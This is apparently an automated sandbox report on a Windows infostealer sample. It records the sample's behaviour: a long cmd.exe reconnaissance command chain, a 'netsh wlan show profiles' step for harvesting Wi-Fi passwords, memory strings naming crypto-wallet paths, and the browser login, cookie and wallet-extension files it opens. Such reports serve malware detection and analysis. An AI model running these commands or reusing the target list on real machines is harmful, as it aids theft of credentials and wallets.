Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
Detected generic credential text file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Cookies.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\Browsers\Firefox\History.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\network_info.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\system_info.txt Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File created: C:\Users\user\AppData\Local\Temp\71434D56-1548-ED3D-AEE6-C75AECD93BF0\process_info.txt Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Electrum": os.path.join(self.RoamingAppData, "Electrum", "wallets"),
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Jaxx": os.path.join(self.RoamingAppData, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb"),
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Exodus": "aholpfdialjgjfhomihkjbmgjidlcdno",
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
Gathers network related connection and port information
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
